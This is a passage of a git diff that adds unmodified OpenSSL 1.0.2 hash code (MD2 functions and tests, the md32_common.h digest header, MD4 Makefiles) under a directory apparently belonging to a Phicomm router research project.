+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/md2.h>
+
+/*
+ * This is a separate file so that #defines in cryptlib.h can map my MD
+ * functions to different names
+ */
+
+unsigned char *MD2(const unsigned char *d, size_t n, unsigned char *md)
+{
+    MD2_CTX c;
+    static unsigned char m[MD2_DIGEST_LENGTH];
+
+    if (md == NULL)
+        md = m;
+    if (!MD2_Init(&c))
+        return NULL;
+#ifndef CHARSET_EBCDIC
+    MD2_Update(&c, d, n);
+#else
+    {
+        char temp[1024];
+        unsigned long chunk;
+
+        while (n > 0) {
+            chunk = (n > sizeof(temp)) ? sizeof(temp) : n;
+            ebcdic2ascii(temp, d, chunk);
+            MD2_Update(&c, temp, chunk);
+            n -= chunk;
+            d += chunk;
+        }
+    }
+#endif
+    MD2_Final(md, &c);
+    OPENSSL_cleanse(&c, sizeof(c)); /* Security consideration */
+    return (md);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md2/md2test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md2/md2test.c
new file mode 100644
index 0000000..49a8a9b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md2/md2test.c
@@ -0,0 +1,142 @@
+/* crypto/md2/md2test.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#include "../e_os.h"
+
+#ifdef OPENSSL_NO_MD2
+int main(int argc, char *argv[])
+{
+    printf("No MD2 support\n");
+    return (0);
+}
+#else
+# include <openssl/evp.h>
+# include <openssl/md2.h>
+
+# ifdef CHARSET_EBCDIC
+#  include <openssl/ebcdic.h>
+# endif
+
+static char *test[] = {
+    "",
+    "a",
+    "abc",
+    "message digest",
+    "abcdefghijklmnopqrstuvwxyz",
+    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
+    "12345678901234567890123456789012345678901234567890123456789012345678901234567890",
+    NULL,
+};
+
+static char *ret[] = {
+    "8350e5a3e24c153df2275c9f80692773",
+    "32ec01ec4a6dac72c0ab96fb34c0b5d1",
+    "da853b0d3f88d99b30283a69e6ded6bb",
+    "ab4f496bfb2a530b219ff33031fe06b0",
+    "4e8ddff3650292ab5a4108c3aa47940b",
+    "da33def2a42df13975352846c30338cd",
+    "d5976f79d83d3a0dc9806c3c66f3efd8",
+};
+
+static char *pt(unsigned char *md);
+int main(int argc, char *argv[])
+{
+    int i, err = 0;
+    char **P, **R;
+    char *p;
+    unsigned char md[MD2_DIGEST_LENGTH];
+
+    P = test;
+    R = ret;
+    i = 1;
+    while (*P != NULL) {
+        EVP_Digest((unsigned char *)*P, strlen(*P), md, NULL, EVP_md2(),
+                   NULL);
+        p = pt(md);
+        if (strcmp(p, *R) != 0) {
+            printf("error calculating MD2 on '%s'\n", *P);
+            printf("got %s instead of %s\n", p, *R);
+            err++;
+        } else
+            printf("test %d ok\n", i);
+        i++;
+        R++;
+        P++;
+    }
+# ifdef OPENSSL_SYS_NETWARE
+    if (err)
+        printf("ERROR: %d\n", err);
+# endif
+    EXIT(err);
+    return err;
+}
+
+static char *pt(unsigned char *md)
+{
+    int i;
+    static char buf[80];
+
+    for (i = 0; i < MD2_DIGEST_LENGTH; i++)
+        sprintf(&(buf[i * 2]), "%02x", md[i]);
+    return (buf);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md32_common.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md32_common.h
new file mode 100644
index 0000000..96828d2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md32_common.h
@@ -0,0 +1,428 @@
+/* crypto/md32_common.h */
+/* ====================================================================
+ * Copyright (c) 1999-2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+/*-
+ * This is a generic 32 bit "collector" for message digest algorithms.
+ * Whenever needed it collects input character stream into chunks of
+ * 32 bit values and invokes a block function that performs actual hash
+ * calculations.
+ *
+ * Porting guide.
+ *
+ * Obligatory macros:
+ *
+ * DATA_ORDER_IS_BIG_ENDIAN or DATA_ORDER_IS_LITTLE_ENDIAN
+ *      this macro defines byte order of input stream.
+ * HASH_CBLOCK
+ *      size of a unit chunk HASH_BLOCK operates on.
+ * HASH_LONG
+ *      has to be at lest 32 bit wide, if it's wider, then
+ *      HASH_LONG_LOG2 *has to* be defined along
+ * HASH_CTX
+ *      context structure that at least contains following
+ *      members:
+ *              typedef struct {
+ *                      ...
+ *                      HASH_LONG       Nl,Nh;
+ *                      either {
+ *                      HASH_LONG       data[HASH_LBLOCK];
+ *                      unsigned char   data[HASH_CBLOCK];
+ *                      };
+ *                      unsigned int    num;
+ *                      ...
+ *                      } HASH_CTX;
+ *      data[] vector is expected to be zeroed upon first call to
+ *      HASH_UPDATE.
+ * HASH_UPDATE
+ *      name of "Update" function, implemented here.
+ * HASH_TRANSFORM
+ *      name of "Transform" function, implemented here.
+ * HASH_FINAL
+ *      name of "Final" function, implemented here.
+ * HASH_BLOCK_DATA_ORDER
+ *      name of "block" function capable of treating *unaligned* input
+ *      message in original (data) byte order, implemented externally.
+ * HASH_MAKE_STRING
+ *      macro convering context variables to an ASCII hash string.
+ *
+ * MD5 example:
+ *
+ *      #define DATA_ORDER_IS_LITTLE_ENDIAN
+ *
+ *      #define HASH_LONG               MD5_LONG
+ *      #define HASH_LONG_LOG2          MD5_LONG_LOG2
+ *      #define HASH_CTX                MD5_CTX
+ *      #define HASH_CBLOCK             MD5_CBLOCK
+ *      #define HASH_UPDATE             MD5_Update
+ *      #define HASH_TRANSFORM          MD5_Transform
+ *      #define HASH_FINAL              MD5_Final
+ *      #define HASH_BLOCK_DATA_ORDER   md5_block_data_order
+ *
+ *                                      <appro@fy.chalmers.se>
+ */
+
+#if !defined(DATA_ORDER_IS_BIG_ENDIAN) && !defined(DATA_ORDER_IS_LITTLE_ENDIAN)
+# error "DATA_ORDER must be defined!"
+#endif
+
+#ifndef HASH_CBLOCK
+# error "HASH_CBLOCK must be defined!"
+#endif
+#ifndef HASH_LONG
+# error "HASH_LONG must be defined!"
+#endif
+#ifndef HASH_CTX
+# error "HASH_CTX must be defined!"
+#endif
+
+#ifndef HASH_UPDATE
+# error "HASH_UPDATE must be defined!"
+#endif
+#ifndef HASH_TRANSFORM
+# error "HASH_TRANSFORM must be defined!"
+#endif
+#ifndef HASH_FINAL
+# error "HASH_FINAL must be defined!"
+#endif
+
+#ifndef HASH_BLOCK_DATA_ORDER
+# error "HASH_BLOCK_DATA_ORDER must be defined!"
+#endif
+
+/*
+ * Engage compiler specific rotate intrinsic function if available.
+ */
+#undef ROTATE
+#ifndef PEDANTIC
+# if defined(_MSC_VER)
+#  define ROTATE(a,n)   _lrotl(a,n)
+# elif defined(__ICC)
+#  define ROTATE(a,n)   _rotl(a,n)
+# elif defined(__MWERKS__)
+#  if defined(__POWERPC__)
+#   define ROTATE(a,n)  __rlwinm(a,n,0,31)
+#  elif defined(__MC68K__)
+    /* Motorola specific tweak. <appro@fy.chalmers.se> */
+#   define ROTATE(a,n)  ( n<24 ? __rol(a,n) : __ror(a,32-n) )
+#  else
+#   define ROTATE(a,n)  __rol(a,n)
+#  endif
+# elif defined(__GNUC__) && __GNUC__>=2 && !defined(OPENSSL_NO_ASM) && !defined(OPENSSL_NO_INLINE_ASM)
+  /*
+   * Some GNU C inline assembler templates. Note that these are
+   * rotates by *constant* number of bits! But that's exactly
+   * what we need here...
+   *                                    <appro@fy.chalmers.se>
+   */
+#  if defined(__i386) || defined(__i386__) || defined(__x86_64) || defined(__x86_64__)
+#   define ROTATE(a,n)  ({ register unsigned int ret;   \
+                                asm (                   \
+                                "roll %1,%0"            \
+                                : "=r"(ret)             \
+                                : "I"(n), "0"((unsigned int)(a))        \
+                                : "cc");                \
+                           ret;                         \
+                        })
+#  elif defined(_ARCH_PPC) || defined(_ARCH_PPC64) || \
+        defined(__powerpc) || defined(__ppc__) || defined(__powerpc64__)
+#   define ROTATE(a,n)  ({ register unsigned int ret;   \
+                                asm (                   \
+                                "rlwinm %0,%1,%2,0,31"  \
+                                : "=r"(ret)             \
+                                : "r"(a), "I"(n));      \
+                           ret;                         \
+                        })
+#  elif defined(__s390x__)
+#   define ROTATE(a,n) ({ register unsigned int ret;    \
+                                asm ("rll %0,%1,%2"     \
+                                : "=r"(ret)             \
+                                : "r"(a), "I"(n));      \
+                          ret;                          \
+                        })
+#  endif
+# endif
+#endif                          /* PEDANTIC */
+
+#ifndef ROTATE
+# define ROTATE(a,n)     (((a)<<(n))|(((a)&0xffffffff)>>(32-(n))))
+#endif
+
+#if defined(DATA_ORDER_IS_BIG_ENDIAN)
+
+# ifndef PEDANTIC
+#  if defined(__GNUC__) && __GNUC__>=2 && !defined(OPENSSL_NO_ASM) && !defined(OPENSSL_NO_INLINE_ASM)
+#   if ((defined(__i386) || defined(__i386__)) && !defined(I386_ONLY)) || \
+      (defined(__x86_64) || defined(__x86_64__))
+#    if !defined(B_ENDIAN)
+    /*
+     * This gives ~30-40% performance improvement in SHA-256 compiled
+     * with gcc [on P4]. Well, first macro to be frank. We can pull
+     * this trick on x86* platforms only, because these CPUs can fetch
+     * unaligned data without raising an exception.
+     */
+#     define HOST_c2l(c,l)        ({ unsigned int r=*((const unsigned int *)(c)); \
+                                   asm ("bswapl %0":"=r"(r):"0"(r));    \
+                                   (c)+=4; (l)=r;                       })
+#     define HOST_l2c(l,c)        ({ unsigned int r=(l);                  \
+                                   asm ("bswapl %0":"=r"(r):"0"(r));    \
+                                   *((unsigned int *)(c))=r; (c)+=4; r; })
+#    endif
+#   elif defined(__aarch64__)
+#    if defined(__BYTE_ORDER__)
+#     if defined(__ORDER_LITTLE_ENDIAN__) && __BYTE_ORDER__==__ORDER_LITTLE_ENDIAN__
+#      define HOST_c2l(c,l)      ({ unsigned int r;              \
+                                   asm ("rev    %w0,%w1"        \
+                                        :"=r"(r)                \
+                                        :"r"(*((const unsigned int *)(c))));\
+                                   (c)+=4; (l)=r;               })
+#      define HOST_l2c(l,c)      ({ unsigned int r;              \
+                                   asm ("rev    %w0,%w1"        \
+                                        :"=r"(r)                \
+                                        :"r"((unsigned int)(l)));\
+                                   *((unsigned int *)(c))=r; (c)+=4; r; })
+#     elif defined(__ORDER_BIG_ENDIAN__) && __BYTE_ORDER__==__ORDER_BIG_ENDIAN__
+#      define HOST_c2l(c,l)      ((l)=*((const unsigned int *)(c)), (c)+=4, (l))
+#      define HOST_l2c(l,c)      (*((unsigned int *)(c))=(l), (c)+=4, (l))
+#     endif
+#    endif
+#   endif
+#  endif
+#  if defined(__s390__) || defined(__s390x__)
+#   define HOST_c2l(c,l) ((l)=*((const unsigned int *)(c)), (c)+=4, (l))
+#   define HOST_l2c(l,c) (*((unsigned int *)(c))=(l), (c)+=4, (l))
+#  endif
+# endif
+
+# ifndef HOST_c2l
+#  define HOST_c2l(c,l)   (l =(((unsigned long)(*((c)++)))<<24),          \
+                         l|=(((unsigned long)(*((c)++)))<<16),          \
+                         l|=(((unsigned long)(*((c)++)))<< 8),          \
+                         l|=(((unsigned long)(*((c)++)))    )           )
+# endif
+# ifndef HOST_l2c
+#  define HOST_l2c(l,c)   (*((c)++)=(unsigned char)(((l)>>24)&0xff),      \
+                         *((c)++)=(unsigned char)(((l)>>16)&0xff),      \
+                         *((c)++)=(unsigned char)(((l)>> 8)&0xff),      \
+                         *((c)++)=(unsigned char)(((l)    )&0xff),      \
+                         l)
+# endif
+
+#elif defined(DATA_ORDER_IS_LITTLE_ENDIAN)
+
+# ifndef PEDANTIC
+#  if defined(__GNUC__) && __GNUC__>=2 && !defined(OPENSSL_NO_ASM) && !defined(OPENSSL_NO_INLINE_ASM)
+#   if defined(__s390x__)
+#    define HOST_c2l(c,l)        ({ asm ("lrv    %0,%1"                  \
+                                   :"=d"(l) :"m"(*(const unsigned int *)(c)));\
+                                   (c)+=4; (l);                         })
+#    define HOST_l2c(l,c)        ({ asm ("strv   %1,%0"                  \
+                                   :"=m"(*(unsigned int *)(c)) :"d"(l));\
+                                   (c)+=4; (l);                         })
+#   endif
+#  endif
+#  if defined(__i386) || defined(__i386__) || defined(__x86_64) || defined(__x86_64__)
+#   ifndef B_ENDIAN
+    /* See comment in DATA_ORDER_IS_BIG_ENDIAN section. */
+#    define HOST_c2l(c,l)        ((l)=*((const unsigned int *)(c)), (c)+=4, l)
+#    define HOST_l2c(l,c)        (*((unsigned int *)(c))=(l), (c)+=4, l)
+#   endif
+#  endif
+# endif
+
+# ifndef HOST_c2l
+#  define HOST_c2l(c,l)   (l =(((unsigned long)(*((c)++)))    ),          \
+                         l|=(((unsigned long)(*((c)++)))<< 8),          \
+                         l|=(((unsigned long)(*((c)++)))<<16),          \
+                         l|=(((unsigned long)(*((c)++)))<<24)           )
+# endif
+# ifndef HOST_l2c
+#  define HOST_l2c(l,c)   (*((c)++)=(unsigned char)(((l)    )&0xff),      \
+                         *((c)++)=(unsigned char)(((l)>> 8)&0xff),      \
+                         *((c)++)=(unsigned char)(((l)>>16)&0xff),      \
+                         *((c)++)=(unsigned char)(((l)>>24)&0xff),      \
+                         l)
+# endif
+
+#endif
+
+/*
+ * Time for some action:-)
+ */
+
+int HASH_UPDATE(HASH_CTX *c, const void *data_, size_t len)
+{
+    const unsigned char *data = data_;
+    unsigned char *p;
+    HASH_LONG l;
+    size_t n;
+
+    if (len == 0)
+        return 1;
+
+    l = (c->Nl + (((HASH_LONG) len) << 3)) & 0xffffffffUL;
+    /*
+     * 95-05-24 eay Fixed a bug with the overflow handling, thanks to Wei Dai
+     * <weidai@eskimo.com> for pointing it out.
+     */
+    if (l < c->Nl)              /* overflow */
+        c->Nh++;
+    c->Nh += (HASH_LONG) (len >> 29); /* might cause compiler warning on
+                                       * 16-bit */
+    c->Nl = l;
+
+    n = c->num;
+    if (n != 0) {
+        p = (unsigned char *)c->data;
+
+        if (len >= HASH_CBLOCK || len + n >= HASH_CBLOCK) {
+            memcpy(p + n, data, HASH_CBLOCK - n);
+            HASH_BLOCK_DATA_ORDER(c, p, 1);
+            n = HASH_CBLOCK - n;
+            data += n;
+            len -= n;
+            c->num = 0;
+            memset(p, 0, HASH_CBLOCK); /* keep it zeroed */
+        } else {
+            memcpy(p + n, data, len);
+            c->num += (unsigned int)len;
+            return 1;
+        }
+    }
+
+    n = len / HASH_CBLOCK;
+    if (n > 0) {
+        HASH_BLOCK_DATA_ORDER(c, data, n);
+        n *= HASH_CBLOCK;
+        data += n;
+        len -= n;
+    }
+
+    if (len != 0) {
+        p = (unsigned char *)c->data;
+        c->num = (unsigned int)len;
+        memcpy(p, data, len);
+    }
+    return 1;
+}
+
+void HASH_TRANSFORM(HASH_CTX *c, const unsigned char *data)
+{
+    HASH_BLOCK_DATA_ORDER(c, data, 1);
+}
+
+int HASH_FINAL(unsigned char *md, HASH_CTX *c)
+{
+    unsigned char *p = (unsigned char *)c->data;
+    size_t n = c->num;
+
+    p[n] = 0x80;                /* there is always room for one */
+    n++;
+
+    if (n > (HASH_CBLOCK - 8)) {
+        memset(p + n, 0, HASH_CBLOCK - n);
+        n = 0;
+        HASH_BLOCK_DATA_ORDER(c, p, 1);
+    }
+    memset(p + n, 0, HASH_CBLOCK - 8 - n);
+
+    p += HASH_CBLOCK - 8;
+#if   defined(DATA_ORDER_IS_BIG_ENDIAN)
+    (void)HOST_l2c(c->Nh, p);
+    (void)HOST_l2c(c->Nl, p);
+#elif defined(DATA_ORDER_IS_LITTLE_ENDIAN)
+    (void)HOST_l2c(c->Nl, p);
+    (void)HOST_l2c(c->Nh, p);
+#endif
+    p -= HASH_CBLOCK;
+    HASH_BLOCK_DATA_ORDER(c, p, 1);
+    c->num = 0;
+    memset(p, 0, HASH_CBLOCK);
+
+#ifndef HASH_MAKE_STRING
+# error "HASH_MAKE_STRING must be defined!"
+#else
+    HASH_MAKE_STRING(c, md);
+#endif
+
+    return 1;
+}
+
+#ifndef MD32_REG_T
+# if defined(__alpha) || defined(__sparcv9) || defined(__mips)
+#  define MD32_REG_T long
+/*
+ * This comment was originaly written for MD5, which is why it
+ * discusses A-D. But it basically applies to all 32-bit digests,
+ * which is why it was moved to common header file.
+ *
+ * In case you wonder why A-D are declared as long and not
+ * as MD5_LONG. Doing so results in slight performance
+ * boost on LP64 architectures. The catch is we don't
+ * really care if 32 MSBs of a 64-bit register get polluted
+ * with eventual overflows as we *save* only 32 LSBs in
+ * *either* case. Now declaring 'em long excuses the compiler
+ * from keeping 32 MSBs zeroed resulting in 13% performance
+ * improvement under SPARC Solaris7/64 and 5% under AlphaLinux.
+ * Well, to be honest it should say that this *prevents*
+ * performance degradation.
+ *                              <appro@fy.chalmers.se>
+ */
+# else
+/*
+ * Above is not absolute and there are LP64 compilers that
+ * generate better code if MD32_REG_T is defined int. The above
+ * pre-processor condition reflects the circumstances under which
+ * the conclusion was made and is subject to further extension.
+ *                              <appro@fy.chalmers.se>
+ */
+#  define MD32_REG_T int
+# endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/Makefile
new file mode 100644
index 0000000..e6f1e44
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/Makefile
@@ -0,0 +1,89 @@
+#
+# OpenSSL/crypto/md4/Makefile
+#
+
+DIR=    md4
+TOP=    ../..
+CC=     cc
+CPP=    $(CC) -E
+INCLUDES=
+CFLAG=-g
+MAKEFILE=       Makefile
+AR=             ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=md4test.c
+APPS=md4.c
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=md4_dgst.c md4_one.c
+LIBOBJ=md4_dgst.o md4_one.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= md4.h
+HEADER= md4_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:    lib
+
+lib:    $(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+	rm -f ../../include/openssl/$(EXHEADER) ../../test/$(TEST) ../../apps/$(APPS)
+
+clean:
+	rm -f asm/mx86unix.cpp *.o asm/*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+md4_dgst.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+md4_dgst.o: ../../include/openssl/md4.h ../../include/openssl/opensslconf.h
+md4_dgst.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+md4_dgst.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+md4_dgst.o: ../../include/openssl/symhacks.h ../md32_common.h md4_dgst.c
+md4_dgst.o: md4_locl.h
+md4_one.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+md4_one.o: ../../include/openssl/md4.h ../../include/openssl/opensslconf.h
+md4_one.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+md4_one.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+md4_one.o: ../../include/openssl/symhacks.h md4_one.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/Makefile.bak
new file mode 100644
index 0000000..e6f1e44
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md4/Makefile.bak
@@ -0,0 +1,89 @@
+#
+# OpenSSL/crypto/md4/Makefile
+#
+
+DIR=    md4
+TOP=    ../..
+CC=     cc
+CPP=    $(CC) -E
+INCLUDES=
+CFLAG=-g
+MAKEFILE=       Makefile
+AR=             ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=md4test.c
+APPS=md4.c
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=md4_dgst.c md4_one.c
+LIBOBJ=md4_dgst.o md4_one.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= md4.h
+HEADER= md4_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:    lib
+
+lib:    $(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+	rm -f ../../include/openssl/$(EXHEADER) ../../test/$(TEST) ../../apps/$(APPS)
+
+clean:
+	rm -f asm/mx86unix.cpp *.o asm/*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+md4_dgst.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+md4_dgst.o: ../../include/openssl/md4.h ../../include/openssl/opensslconf.h
+md4_dgst.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+md4_dgst.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+md4_dgst.o: ../../include/openssl/symhacks.h ../md32_common.h md4_dgst.c
+md4_dgst.o: md4_locl.h
